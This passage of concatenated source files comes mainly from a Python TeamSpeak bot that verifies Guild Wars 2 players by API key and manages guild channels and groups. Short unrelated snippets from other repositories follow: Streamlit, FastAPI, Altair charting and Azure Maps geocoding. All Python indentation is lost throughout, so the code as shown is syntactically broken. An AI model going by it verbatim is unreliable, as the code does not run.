raw_clid = event.parsed[0].get('clid')
raw_cluid = event.parsed[0].get('client_unique_identifier')
if raw_clid == self.client_id:
return
if self.clientNeedsVerify(raw_cluid):
self.ts_connection.ts3exec(lambda ts_connection: ts_connection.exec_("sendtextmessage", targetmode = 1, target = raw_clid, msg = Config.locale.get("bot_msg_verify")),
ignore_exception_handler) # error 516: invalid client type: another query-client logged in
def commandCheck(self, command_string):
action=(None, None)
for allowed_cmd in Config.cmd_list:
if re.match('(^%s)\s*' % (allowed_cmd,), command_string):
toks = command_string.split() # no argument for split() splits on arbitrary whitespace
action = (toks[0], toks[1:])
return action
def try_get(self, dictionary, key, lower = False, typer = lambda x: x, default = None):
v = typer(dictionary[key] if key in dictionary else default)
return v.lower() if lower and isinstance(v, str) else v
def setResetroster(self, ts3conn, date, red = [], green = [], blue = [], ebg = []):
leads = ([], red, green, blue, ebg) # keep RGB order! EBG as last! Pad first slot (header) with empty list
channels = [(p,c.replace("$DATE", date)) for p,c in Config.reset_channels]
for i in range(len(channels)):
pattern, clean = channels[i]
lead = leads[i]
chan, ts3qe = ts3conn.ts3exec(lambda tsc: tsc.query("channelfind", pattern = pattern).first(), signal_exception_handler)
if ts3qe is not None:
if hasattr(ts3qe,"resp") and ts3qe.resp.error["id"] == "1281":
# empty result set
# no channel found for that pattern
log.warning("No channel found with pattern '%s'. Skipping.", pattern)
else:
log.error("Unexpected exception while trying to find a channel: %s", ts3qe)
raise ts3qe
else:
#newname = "%s%s" % (clean, ", ".join(lead))
TS3_MAX_SIZE_CHANNEL_NAME = 40
shortened = StringShortener(TS3_MAX_SIZE_CHANNEL_NAME - len(clean)).shorten(lead)
newname = newname = "%s%s" % (clean, ", ".join(shortened))
_, ts3qe = ts3conn.ts3exec(lambda tsc: tsc.exec_("channeledit", cid = chan.get("cid"), channel_name = newname), signal_exception_handler)
if ts3qe is not None and ts3qe.resp.error["id"] == "771":
# channel name already in use
# probably not a bug (channel still unused), but can be a config problem
log.info("Channel '%s' already exists. This is probably not a problem. Skipping.", newname)
def getGuildInfo(self, guildname):
'''
Lookup guild by name. If such a guild exists (and the API is available)
the info as specified on https://wiki.guildwars2.com/wiki/API:2/guild/:id is returned.
Else, None is returned.
'''
ids = request("https://api.guildwars2.com/v2/guild/search?name=%s" % (urllib.parse.quote(guildname),))
return None if ids is None or len(ids) == 0 else request("https://api.guildwars2.com/v2/guild/%s" % (ids[0]))
def removeGuild(self, name):
'''
Removes a guild from the TS. That is:
- deletes their guild channel and all their subchannels by force
- removes the group from TS by force
- remove the auto-assignment for that group from the DB
name: name of the guild as in the game
'''
SUCCESS = 0
INVALID_GUILD_NAME = 1
NO_DB_ENTRY = 2
INVALID_PARAMETERS = 5
if name is None:
return INVALID_PARAMETERS
ginfo = self.getGuildInfo(name)
if ginfo is None:
return INVALID_GUILD_NAME
with self.dbc.lock:
g = self.dbc.cursor.execute("SELECT ts_group FROM guilds WHERE guild_name = ?", (name,)).fetchone()
groupname = g[0] if g is not None else None
if groupname is None:
return NO_DB_ENTRY
ts3conn = self.ts_connection
tag = ginfo.get("tag")
# FROM DB
log.debug("Deleting guild '%s' from DB.", name)
with self.dbc.lock:
self.dbc.cursor.execute("DELETE FROM guilds WHERE guild_name = ?", (name,))
self.dbc.conn.commit()
# CHANNEL
channelname = "%s [%s]" % (name, tag)
channel, ex = ts3conn.ts3exec(lambda tsc: tsc.query("channelfind", pattern = channelname).first(), signal_exception_handler)
if channel is None:
log.debug("No channel '%s' to delete.", channelname)
else:
log.debug("Deleting channel '%s'.", channelname)
ts3conn.ts3exec(lambda tsc: tsc.exec_("channeldelete", cid = channel.get("cid"), force = 1))
# GROUP
groups, ex = ts3conn.ts3exec(lambda tsc: tsc.query("servergrouplist").all())
group = next((g for g in groups if g.get("name") == groupname), None)
if group is None:
log.debug("No group '%s' to delete.", groupname)
else:
log.debug("Deleting group '%s'.", groupname)
ts3conn.ts3exec(lambda tsc: tsc.exec_("servergroupdel", sgid = group.get("sgid"), force = 1))
return SUCCESS
def createGuild(self, name, tag, groupname, contacts):
'''
Creates a guild in the TS.
- retrieves and uploads their emblem as icon
- creates guild channel with subchannels as read from the config with the icon
- creates a guild group with the icon and appropriate permissions
- adds in automatic assignment of the guild group upon re-verification
- adds the contact persons as initial channel description
- gives the contact role to the contact persons if they can be found in the DB
name: name of the guild as is seen ingame
tag: their tag
groupname: group that should be used for them. Useful if the tag is already taken
contacts: list of account names (Foo.1234) that should be noted down as contact and receive the special role for the new channel
returns: 0 for success or an error code indicating the problem (see below)
'''
SUCCESS = 0
DUPLICATE_TS_GROUP = 1
DUPLICATE_DB_ENTRY = 2
DUPLICATE_TS_CHANNEL = 3
MISSING_PARENT_CHANNEL = 4
INVALID_PARAMETERS = 5
if (name is None or tag is None or groupname is None or contacts is None
or len(name) < 3 or len(tag) < 2 or len(groupname) < 3
or not isinstance(contacts, list)):
return INVALID_PARAMETERS
ts3conn = self.ts_connection
channelname = "%s [%s]" % (name, tag)
channel_description = self.create_guild_channel_description(contacts, name, tag)
log.info("Creating guild '%s' with tag '%s', guild group '%s', and contacts '%s'." % (name, tag, groupname, ", ".join(contacts)))
# lock for the whole block to avoid constant interference
# locking the ts3conn is vital to properly do the TS3FileTransfer
# down the line.
with ts3conn.lock, self.dbc.lock:
#############################################
# CHECK IF GROUPS OR CHANNELS ALREADY EXIST #
#############################################
log.debug("Doing preliminary checks.")
groups, ex = ts3conn.ts3exec(lambda tsc: tsc.query("servergrouplist").all(), default_exception_handler)
group = next((g for g in groups if g.get("name") == groupname), None)
if group is not None:
# group already exists!
log.debug("Can not create a group '%s', because it already exists. Aborting guild creation.", group)
return DUPLICATE_TS_GROUP
with self.dbc.lock:
dbgroups = self.dbc.cursor.execute("SELECT ts_group, guild_name FROM guilds WHERE ts_group = ?", (groupname,)).fetchall()
if(len(dbgroups) > 0):
log.debug("Can not create a DB entry for TS group '%s', as it already exists. Aborting guild creation.", groupname)
return DUPLICATE_DB_ENTRY
channel, ex = ts3conn.ts3exec(lambda tsc: tsc.query("channelfind", pattern = channelname).first(), signal_exception_handler)
if channel is not None:
# channel already exists!
log.debug("Can not create a channel '%s', as it already exists. Aborting guild creation.", channelname)
return DUPLICATE_TS_CHANNEL
parent, ex = ts3conn.ts3exec(lambda tsc: tsc.query("channelfind", pattern = Config.guilds_parent_channel).first(), signal_exception_handler)
if parent is None:
# parent channel does not exist!
log.debug("Can not find a parent-channel '%s' for guilds. Aborting guild creation.", Config.guilds_parent_channel)
return MISSING_PARENT_CHANNEL
log.debug("Checks complete.")
#Icon uploading
icon_id = self.handle_guild_icon(name, ts3conn) #Returns None if no icon
##################################
# CREATE CHANNEL AND SUBCHANNELS #
##################################
log.debug("Creating guild channels...")
pid = parent.get("cid")
info, ex = ts3conn.ts3exec(lambda tsc: tsc.query("channelinfo", cid = pid).all(), signal_exception_handler)
# assert channel and group both exist and parent channel is available
all_guild_channels = [c for c in ts3conn.ts3exec(lambda tc: tc.query("channellist").all(), signal_exception_handler)[0] if c.get("pid") == pid]
all_guild_channels.sort(key=lambda c: c.get("channel_name"), reverse = True)
# Assuming the channels are already in order on the server,
# find the first channel whose name is alphabetically smaller than the new channel name.
# The sort_order of channels actually specifies after which channel they should be
# inserted. Giving 0 as sort_order puts them in first place after the parent.
found_place = False
sort_order = 0
i = 0
while i < len(all_guild_channels) and not found_place:
if all_guild_channels[i].get("channel_name") > channelname:
i += 1
else:
sort_order = int(all_guild_channels[i].get("cid"))
found_place = True
cinfo, ex = ts3conn.ts3exec(lambda tsc: tsc.query("channelcreate"
, channel_name = channelname
, channel_description = channel_description
, cpid = pid
, channel_flag_permanent = 1
, channel_maxclients = 0
, channel_order = sort_order
, channel_flag_maxclients_unlimited = 0)
.first(), signal_exception_handler)
perms = [("i_channel_needed_join_power", 25),
("i_channel_needed_subscribe_power", 25),
("i_channel_needed_modify_power", 45),
("i_channel_needed_delete_power", 75)
]
if icon_id is not None:
perms.append(("i_icon_id", icon_id))
def channeladdperm(cid, permsid, permvalue):
return ts3conn.ts3exec(lambda tsc: tsc.exec_("channeladdperm"
, cid = cid
, permsid = permsid
, permvalue = permvalue
, permnegated = 0
, permskip = 0)
, signal_exception_handler)
for p,v in perms:
_, ex = channeladdperm(cinfo.get("cid"), p, v)
for c in Config.guild_sub_channels:
# FIXME: error check
res, ex = ts3conn.ts3exec(lambda tsc: tsc.query("channelcreate"
, channel_name = c
, cpid = cinfo.get("cid")
, channel_flag_permanent = 1)
.first(), signal_exception_handler)
###################
# CREATE DB GROUP #
###################
# must exist in DB before creating group to have it available when reordering groups.
log.debug("Creating entry in database for auto assignment of guild group...")
with self.dbc.lock:
self.dbc.cursor.execute("INSERT INTO guilds(ts_group, guild_name) VALUES(?,?)", (groupname, name))
self.dbc.conn.commit()
#######################
# CREATE SERVER GROUP #
#######################
log.debug("Creating and configuring server group...")
resp, ex = ts3conn.ts3exec(lambda tsc: tsc.query("servergroupadd", name = groupname).first(), signal_exception_handler)
guildgroupid = resp.get("sgid")
if ex is not None and ex.resp.error["id"] == "1282":
log.warning("Duplication error while trying to create the group '%s' for the guild %s [%s]." % (groupname, name, tag))
def servergroupaddperm(sgid, permsid, permvalue):
return ts3conn.ts3exec(lambda tsc: tsc.exec_("servergroupaddperm"
, sgid = sgid
, permsid = permsid
, permvalue = permvalue
, permnegated = 0
, permskip = 0)
, signal_exception_handler)
perms = [
("b_group_is_permanent", 1),
("i_group_show_name_in_tree", 1),
("i_group_needed_modify_power", 75),
("i_group_needed_member_add_power", 50),
("i_group_needed_member_remove_power", 50),
("i_group_sort_id", Config.guilds_sort_id),
]
if icon_id is not None:
perms.append(("i_icon_id", icon_id))
for p,v in perms:
x,ex = servergroupaddperm(guildgroupid, p, v)
groups.append({"sgid": resp.get("sgid"), "name": groupname}) # the newly created group has to be added to properly iterate over the guild groups
guildgroups = []
with self.dbc.lock:
guildgroups = [g[0] for g in self.dbc.cursor.execute("SELECT ts_group FROM guilds ORDER BY ts_group").fetchall()]
for i in range(len(guildgroups)):
g = next((g for g in groups if g.get("name") == guildgroups[i]), None)
if g is None:
# error! Group deleted from TS, but not from DB!
log.warning("Found guild '%s' in the database, but no coresponding server group! Skipping this entry, but it should be fixed!", guildgroups[i])
else:
tp = Config.guilds_maximum_talk_power - i
if tp < 0:
log.warning("Talk power for guild %s is below 0.", g.get("name"))
# sort guild groups to have users grouped by their guild tag alphabetically in channels
x,ex = servergroupaddperm(g.get("sgid"), "i_client_talk_power", tp)
################
# ADD CONTACTS #
################
log.debug("Adding contacts...")
cgroups, ex = ts3conn.ts3exec(lambda tsc: tsc.query("channelgrouplist").all(), default_exception_handler)
contactgroup = next((cg for cg in cgroups if cg.get("name") == Config.guild_contact_channel_group), None)
if contactgroup is None:
log.debug("Can not find a group '%s' for guild contacts. Skipping.", contactgroup)
else:
for c in contacts:
with self.dbc.lock:
accs = [row[0] for row in self.dbc.cursor.execute("SELECT ts_db_id FROM users WHERE lower(account_name) = lower(?)", (c,)).fetchall()]
for a in accs:
errored = False
try:
u = User(ts3conn, unique_id = a, ex_hand = signal_exception_handler)
tsdbid = u.ts_db_id
_, ex = ts3conn.ts3exec(lambda tsc: tsc.exec_("setclientchannelgroup"
, cid = cinfo.get("cid")
, cldbid = tsdbid
, cgid = contactgroup.get("cgid"))
, signal_exception_handler)
# while we are at it, add the contacts to the guild group as well
_, ex2 = ts3conn.ts3exec(lambda tsc: tsc.exec_("servergroupaddclient"
, sgid = guildgroupid
, cldbid = tsdbid)
, signal_exception_handler)
errored = ex is not None
except Exception as ex:
errored = True
if errored:
log.error("Could not assign contact role '%s' to user '%s' with DB-unique-ID '%s' in guild channel for %s. Maybe the uid is not valid anymore."
, Config.guild_contact_channel_group, c, a, name)
return SUCCESS
def handle_guild_icon(self, name, ts3conn):
#########################################
# RETRIEVE AND UPLOAD GUILD EMBLEM ICON #
#########################################
log.debug("Retrieving and uploading guild emblem as icon from gw2mists...")
icon_url = "https://api.gw2mists.de/guilds/emblem/%s/50.svg" % (urllib.parse.quote(name),)
icon = requests.get(icon_url)
# funnily enough, giving an invalid guild (or one that has no emblem)
# results in HTTP 200, but a JSON explaining the error instead of an SVG image.
# Storing this JSON and uploading it to TS just fails silently without
# causing any problems!
# Therefore checking content length..
if len(icon.content) > 0:
icon_id = binascii.crc32(name.encode('utf8'))
icon_local_file_name = "%s_icon.svg" % (urllib.parse.quote(name),) # using name instead of tag, because tags are not unique
icon_server_path = "/icon_%s" % (icon_id,)
self.upload_icon(icon, icon_local_file_name, icon_server_path, ts3conn)
return icon_id
else:
log.debug("Empty Response. Guild probably has no icon. Skipping Icon upload.")
return None
def upload_icon(self, icon, icon_file_name, icon_server_path, ts3conn):
def _ts_file_upload_hook(c: ts3.response.TS3QueryResponse):
if (c is not None) and (c.parsed is not None) \
and (len(c.parsed) == 1) and (c.parsed[0] is not None) \
and "msg" in c.parsed[0].keys() and c.parsed[0]["msg"] == "invalid size":
from ts3.filetransfer import TS3UploadError
raise TS3UploadError(0, "The uploaded Icon is too large")
return None
with open(icon_file_name, "w+b") as fh:
try:
# svg
fh.write(icon.content)
fh.flush()
fh.seek(0)
# it is important to have acquired the lock for the ts3conn globally
# at this point, as we directly pass the wrapped connection around
upload = ts3.filetransfer.TS3FileTransfer(ts3conn.ts_connection)
res = upload.init_upload(input_file=fh,
name=icon_server_path,
cid=0,
query_resp_hook=lambda c: _ts_file_upload_hook(c))
log.info(f"Icon {icon_file_name} uploaded as {icon_server_path}.")
except ts3.common.TS3Error as ts3error:
log.error("Error Uploading icon {icon_file_name}.")
log.error(ts3error)
finally:
fh.close()
os.remove(icon_file_name)
def create_guild_channel_description(self, contacts, name, tag):
contacts = "\n".join([" • %s" % c for c in contacts])
text = (f"[center]\n"
f"[img]https://api.gw2mists.de/guilds/emblem/{urllib.parse.quote(name)}/128.svg[/img]\n"
f"[size=20]{name} - {tag}[/size]\n"
f"[/center]\n"
f"[hr]\n"
f"[size=12]Contacts:[/size]\n"
f"{contacts}\n"
f"[hr]\n")
return text
def clientMessageHandler(self, ipcserver, clientsocket, message):
mtype = self.try_get(message, "type", lower = True)
mcommand = self.try_get(message, "command", lower = True)
margs = self.try_get(message, "args", typer = lambda a: dict(a), default = {})
mid = self.try_get(message, "message_id", typer = lambda a: int(a), default = -1)
log.debug("[%s] %s", mtype, mcommand)
if mtype == "post":
# POST commands
if mcommand == "setresetroster":
mdate = self.try_get(margs, "date", default = "dd.mm.yyyy")
mred = self.try_get(margs, "rbl", default = [])
mgreen = self.try_get(margs, "gbl", default = [])
mblue = self.try_get(margs, "bbl", default = [])
mebg = self.try_get(margs, "ebg", default = [])
self.setResetroster(ipcserver.ts_connection, mdate, mred, mgreen, mblue, mebg)
if mcommand == "createguild":
mname = self.try_get(margs, "name", default = None)
mtag = self.try_get(margs, "tag", default = None)
mgroupname = self.try_get(margs, "tsgroup", default = mtag)
mcontacts = self.try_get(margs, "contacts", default = [])
res = -1 if mname is None or mtag is None else self.createGuild(mname, mtag, mgroupname, mcontacts)
clientsocket.respond(mid, mcommand, {"status": res})
if mtype == "delete":
# DELETE commands
if mcommand == "user":
mgw2account = self.try_get(margs,"gw2account", default = "")
log.info("Received request to delete user '%s' from the TS registration database.", mgw2account)
changes = self.removePermissionsByGW2Account(mgw2account)
clientsocket.respond(mid, mcommand, {"deleted": changes})
if mcommand == "guild":
mname = self.try_get(margs, "name", default = None)
log.info("Received request to delete guild %s", mname)
res = self.removeGuild(mname)
print(res)
clientsocket.respond(mid, mcommand, {"status": res})
# Handler that is used every time an event (message) is received from teamspeak server
def messageEventHandler(self, event):
"""
*event* is a ts3.response.TS3Event instance, that contains the name
of the event and the data.
"""
log.debug("event.event: %s", event.event)
raw_cmd = event.parsed[0].get('msg')
rec_from_name = event.parsed[0].get('invokername').encode('utf-8') #fix any encoding issues introduced by Teamspeak
rec_from_uid = event.parsed[0].get('invokeruid')
rec_from_id = event.parsed[0].get('invokerid')
rec_type = event.parsed[0].get('targetmode')
if rec_from_id == self.client_id:
return #ignore our own messages.
try:
# Type 2 means it was channel text
if rec_type == "2":
cmd, args = self.commandCheck(raw_cmd) #sanitize the commands but also restricts commands to a list of known allowed commands
if cmd == "hideguild":
log.info("User '%s' wants to hide guild '%s'.", rec_from_name, args[0])
with self.dbc.lock:
try:
self.dbc.cursor.execute("INSERT INTO guild_ignores(guild_id, ts_db_id, ts_name) VALUES((SELECT guild_id FROM guilds WHERE ts_group = ?), ?,?)", (args[0], rec_from_uid, rec_from_name))
self.dbc.conn.commit()
log.debug("Success!")
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_hide_guild_success")))
except sqlite3.IntegrityError:
self.dbc.conn.rollback()
log.debug("Failed. The group probably doesn't exist or the user is already hiding that group.")
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_hide_guild_unknown")))
elif cmd == "unhideguild":
log.info("User '%s' wants to unhide guild '%s'.", rec_from_name, args[0])
with self.dbc.lock:
self.dbc.cursor.execute("DELETE FROM guild_ignores WHERE guild_id = (SELECT guild_id FROM guilds WHERE ts_group = ? AND ts_db_id = ?)", (args[0], rec_from_uid))
changes = self.dbc.cursor.execute("SELECT changes()").fetchone()[0];
self.dbc.conn.commit()
if changes > 0:
log.debug("Success!")
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_unhide_guild_success")))
else:
log.debug("Failed. Either the guild is unknown or the user had not hidden the guild anyway.")
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_unhide_guild_unknown")))
elif cmd == 'verifyme':
return # command disabled for now
if self.clientNeedsVerify(rec_from_uid):
log.info("Verify Request Recieved from user '%s'. Sending PM now...\n ...waiting for user response.", rec_from_name)
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_msg_verify")))
else:
log.info("Verify Request Recieved from user '%s'. Already verified, notified user.", rec_from_name)
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_msg_alrdy_verified")))
# Type 1 means it was a private message
elif rec_type == '1':
#reg_api_auth='\s*(\S+\s*\S+\.\d+)\s+(.*?-.*?-.*?-.*?-.*)\s*$'
reg_api_auth='\s*(.*?-.*?-.*?-.*?-.*)\s*$'
#Command for verifying authentication
if re.match(reg_api_auth, raw_cmd):
pair = re.search(reg_api_auth, raw_cmd)
uapi = pair.group(1)
if self.clientNeedsVerify(rec_from_uid):
log.info("Received verify response from %s", rec_from_name)
auth = TS3Auth.AuthRequest(uapi)
log.debug('Name: |%s| API: |%s|' % (auth.name, uapi))
if auth.success:
limit_hit = self.TsClientLimitReached(auth.name)
if Config.DEBUG:
log.debug("Limit hit check: %s", limit_hit)
if not limit_hit:
log.info("Setting permissions for %s as verified.", rec_from_name)
#set permissions
self.setPermissions(rec_from_uid)
#get todays date
today_date = datetime.date.today()
#Add user to database so we can query their API key over time to ensure they are still on our server
self.addUserToDB(rec_from_uid, auth.name, uapi, today_date, today_date)
self.updateGuildTags(User(self.ts_connection, unique_id = rec_from_uid, ex_hand = signal_exception_handler), auth)
# self.updateGuildTags(rec_from_uid, auth)
log.debug("Added user to DB with ID %s", rec_from_uid)
#notify user they are verified
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_msg_success")))
else:
# client limit is set and hit
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_msg_limit_Hit")))
log.info("Received API Auth from %s, but %s has reached the client limit.", rec_from_name, rec_from_name)
else:
#Auth Failed
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_msg_fail")))
else:
log.debug("Received API Auth from %s, but %s is already verified. Notified user as such.", rec_from_name, rec_from_name)
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_msg_alrdy_verified")))
else:
self.ts_connection.ts3exec(lambda tsc: tsc.exec_("sendtextmessage", targetmode = 1, target = rec_from_id, msg = Config.locale.get("bot_msg_rcv_default")))
log.info("Received bad response from %s [msg= %s]", rec_from_name, raw_cmd.encode('utf-8'))
# sys.exit(0)
except Exception as e:
log.error("BOT Event: Something went wrong during message received from teamspeak server. Likely bad user command/message.")
log.error(e)
log.error(traceback.format_exc())
return None
#######################################
class Ticker(object):
'''
Class that schedules events regularly and wraps the TS3Bot.
'''
def __init__(self, ts3bot, interval):
self.ts3bot = ts3bot
self.interval = interval
schedule.every(interval).seconds.do(self.execute)
def execute(self):
pass
#######################################
class Channel(object):
def __init__(self, ts_conn, channel_id):
self.ts_conn = ts_conn
self.channel_id = channel_id
#######################################
class User(object):
'''
Class that interfaces the Teamspeak-API with user-specific calls more convenient.
Since calls to the API are penalised, the class also tries to minimise those calls
by only resolving properties when they are actually needed and then caching them (if sensible).
'''
def __init__(self, ts_conn, unique_id = None, ts_db_id = None, client_id = None, ex_hand = None):
self.ts_conn = ts_conn
self._unique_id = unique_id
self._ts_db_id = ts_db_id
self._client_id = client_id
self._exception_handler = ex_hand if ex_hand is not None else default_exception_handler
if all(x is None for x in [unique_id, ts_db_id, client_id]):
raise Error("At least one ID must be non-null")
def __repr__(self):
return str(self)
def __str__(self):
return "User[unique_id: %s, ts_db_id: %s, client_id: %s]" % (self.unique_id, self.ts_db_id, self._client_id)
@property
def current_channel(self):
entry = next((c for c in self.ts_conn.ts3exec(lambda t: t.query("clientlist").all(), self._exception_handler)[0] if c.get("clid") == self.client_id), None)
if entry:
self._ts_db_id = entry.get("client_database_id") # since we are already retrieving this information...
return Channel(self.ts_conn, entry.get("cid")) if entry else None
@property
def name(self):
return self.ts_conn.ts3exec(lambda t: t.query("clientgetids", cluid = self.unique_id).first().get("name"), self._exception_handler)[0]
@property
def unique_id(self):
if self._unique_id is None:
if self._ts_db_id is not None:
self._unique_id, ex = self.ts_conn.ts3exec(lambda t: t.query("clientgetnamefromdbid", cldbid = self._ts_db_id).first().get("cluid"), self._exception_handler)
elif self._client_id is not None:
ids, ex = self.ts_conn.ts3exec(lambda t: t.query("clientinfo", clid = self._client_id).first(), self._exception_handler)
self._unique_id = ids.get("client_unique_identifier")
self._ts_db_id = ids.get("client_databased_id") # not required, but since we already queried it...
else:
raise Error("Unique ID can not be retrieved")
return self._unique_id
@property
def ts_db_id(self):
if self._ts_db_id is None:
if self._unique_id is not None:
self._ts_db_id, ex = self.ts_conn.ts3exec(lambda t: t.query("clientgetdbidfromuid", cluid = self._unique_id).first().get("cldbid"), self._exception_handler)
elif self._client_id is not None:
ids, ex = self.ts_conn.ts3exec(lambda t: t.query("clientinfo", clid = self._client_id).first(), self._exception_handler)
self._unique_id = ids.get("client_unique_identifier") # not required, but since we already queried it...
self._ts_db_id = ids.get("client_database_id")
else:
raise Error("TS DB ID can not be retrieved")
return self._ts_db_id
@property
def client_id(self):
if self._client_id is None:
if self._unique_id is not None:
# easiest case: unique ID is set
self._client_id, ex = self.ts_conn.ts3exec(lambda t: t.query("clientgetids", cluid = self._unique_id).first().get("clid"), self._exception_handler)
elif self._ts_db_id is not None:
self._unique_id, ex = self.ts_conn.ts3exec(lambda t: t.query("clientgetnamefromdbid", cldbid = self._ts_db_id).first().get("cluid"), self._exception_handler)
self._client_id, ex = self.ts_conn.ts3exec(lambda t: t.query("clientgetids", cluid = self._unique_id).first().get("clid"), self._exception_handler)
else:
raise Error("Client ID can not be retrieved")
return self._client_id
#######################################
class CommanderChecker(Ticker):
def __init__(self, ts3bot, ipcserver, commander_group_names, interval = 60):
super(CommanderChecker, self).__init__(ts3bot, interval)
self.commander_group_names = commander_group_names
self.ipcserver = ipcserver
cgroups = list(filter(lambda g: g.get("name") in commander_group_names, self.ts3bot.ts_connection.ts3exec(lambda t: t.query("channelgrouplist").all())[0]))
if len(cgroups) < 1:
log.info("Could not find any group of %s to determine commanders by. Disabling this feature.", str(commander_group_names))
self.commander_groups = []
return
self.commander_groups = [c.get("cgid") for c in cgroups]
def execute(self):
if not self.commander_groups:
return # disabled if no groups were found
active_commanders = []
def retrieve_commanders(tsc):
command = tsc.query("channelgroupclientlist")
for cgid in self.commander_groups:
command.pipe(cgid = cgid)
return command.all()
acs, ts3qe = self.ts3bot.ts_connection.ts3exec(retrieve_commanders, signal_exception_handler)
if ts3qe: # check for .resp, could by another exception type
if ts3qe.resp is not None:
if ts3qe.resp.error["id"] != "1281":
print(ts3qe.resp.error["id"])
print(type(ts3qe.resp.error["id"]))
print(ts3qe.resp.error["id"] == "1281")
# 1281 is "database empty result set", which is an expected error
# if not a single user currently wears a tag.
log.error("Error while trying to resolve active commanders: %s.", str(ts3qe))
else:
print(ts3qe)
print(ts3qe.resp)
print(ts3qe.resp.error["id"])
print(ts3qe.resp.error)
else:
active_commanders_entries = [(c, self.ts3bot.getUserDBEntry(self.ts3bot.getTsUniqueID(c.get("cldbid")))) for c in acs]
for ts_entry, db_entry in active_commanders_entries:
if db_entry is not None: # or else the user with the commander group was not registered and therefore not in the DB
u = User(self.ts3bot.ts_connection, ts_db_id = ts_entry.get("cldbid"))
if u.current_channel.channel_id == ts_entry.get("cid"):
# user could have the group in a channel but not be in there atm
ac = {}
ac["account_name"] = db_entry["account_name"]
ac["ts_cluid"] = db_entry["ts_db_id"]
ac["ts_display_name"], ex1 = self.ts3bot.ts_connection.ts3exec(lambda t: t.query("clientgetnamefromuid", cluid = db_entry["ts_db_id"]).first().get("name")) # no, there is probably no easier way to do this. I checked.
ac["ts_channel_name"], ex2 = self.ts3bot.ts_connection.ts3exec(lambda t: t.query("channelinfo", cid = ts_entry.get("cid")).first().get("channel_name"))
if ex1 or ex2:
log.warning("Could not determine information for commanding user with ID %s: '%s'. Skipping." % (str(ts_entry), ", ".join([str(e) for e in [ex1,ex2] if e is not None])))
else:
active_commanders.append(ac)
# print({"commanders": active_commanders})
self.ipcserver.broadcast({"commanders": active_commanders})
#######################################
```
|
{
"source": "JeyDi/docker-starter-kit",
"score": 3
}
|
#### File: cookiecutter-example/{{cookiecutter.project_slug}}/lblocker.py
```python
import re
from werkzeug import serving
def disable_endpoint_logs():
"""Disable logs for requests to specific endpoints."""
# Endpoint logging to disable
disabled_endpoints = ("/", "/monitoring/analysis/status")
parent_log_request = serving.WSGIRequestHandler.log_request
def log_request(self, *args, **kwargs):
if not any(re.match(f"{de}$", self.path) for de in disabled_endpoints):
parent_log_request(self, *args, **kwargs)
serving.WSGIRequestHandler.log_request = log_request
# remember to call the function at the end of logging.py file
disable_endpoint_logs()
```
#### File: src/pages/page2.py
```python
import streamlit as st
from ..utils import Page
class Page2(Page):
def __init__(self, state):
self.state = state
def write(self):
st.title("Page 2")
st.write(self.state.client_config["slider_value"])
```
#### File: streamlit-stream/producer/main.py
```python
from fastapi import FastAPI, WebSocket
from random import choice, randint
import asyncio
app = FastAPI()
CHANNELS = ["A", "B", "C"]
@app.websocket("/sample")
async def websocket_endpoint(websocket: WebSocket):
await websocket.accept()
while True:
await websocket.send_json({
"channel": choice(CHANNELS),
"data": randint(1, 10)
}
)
await asyncio.sleep(0.5)
```
#### File: src/common/charts.py
```python
import altair as alt
import pandas as pd
from .constants import MatColors
def get_candlestick(data_dict, sampling_freq, **kwargs):
source = pd.DataFrame(list(data_dict))
source.ts = source.ts.astype("datetime64[ms]")
source = source.set_index("ts")
source = source.price.resample(sampling_freq).ohlc().reset_index().bfill()
open_close_color = alt.condition(
"datum.open <= datum.close",
alt.value(MatColors.GREEN_700.value),
alt.value(MatColors.RED_700.value),
)
base_chart = alt.Chart(source).encode(
alt.X("ts:T", axis=alt.Axis(labelAngle=-45,)), color=open_close_color
)
rule = base_chart.mark_rule().encode(
alt.Y("low:Q", scale=alt.Scale(zero=False), title="Price"), alt.Y2("high:Q")
)
bar = base_chart.mark_bar().encode(alt.Y("open:Q"), alt.Y2("close:Q"))
return rule + bar
def get_line(data_dict, sampling_freq, **kwargs):
source = pd.DataFrame(list(data_dict))
source.ts = source.ts.astype("datetime64[ms]")
source = source.set_index("ts").resample(sampling_freq).mean().reset_index().bfill()
base_chart = (
alt.Chart(source)
.mark_area(
line={"color": "darkgreen"},
color=alt.Gradient(
gradient="linear",
stops=[
alt.GradientStop(color="white", offset=0),
alt.GradientStop(color="darkgreen", offset=1),
],
x1=1,
x2=1,
y1=1,
y2=0,
),
)
.encode(
x=alt.X("ts:T"),
y=alt.Y(
"price:Q",
scale=alt.Scale(domain=[source.price.min(), source.price.max()]),
),
)
)
return base_chart
def get_bars(data_dict, sampling_freq, **kwargs):
source = pd.DataFrame(list(data_dict))
source.ts = source.ts.astype("datetime64[ms]")
source = source.set_index("ts").resample(sampling_freq).mean().reset_index().bfill()
base_chart = (
alt.Chart(source).mark_bar().encode(x=alt.X("ts:T"), y=alt.Y("price:Q"))
)
return base_chart
CHARTS = {"candlestick": get_candlestick, "line": get_line, "bar": get_bars}
```
|
{
"source": "JeyDi/E-Grid",
"score": 3
}
|
#### File: E-Grid/maps/geocoding.py
```python
import json
import urllib
import requests
import yaml
def geolocalize(configs):
url = "https://atlas.microsoft.com/search/address/json?"
params = {'subscription-key': configs['subscription_key'], "api-version": "1.0"}
with open("poi/result_p&t.json", "rt", encoding="utf8") as inf, \
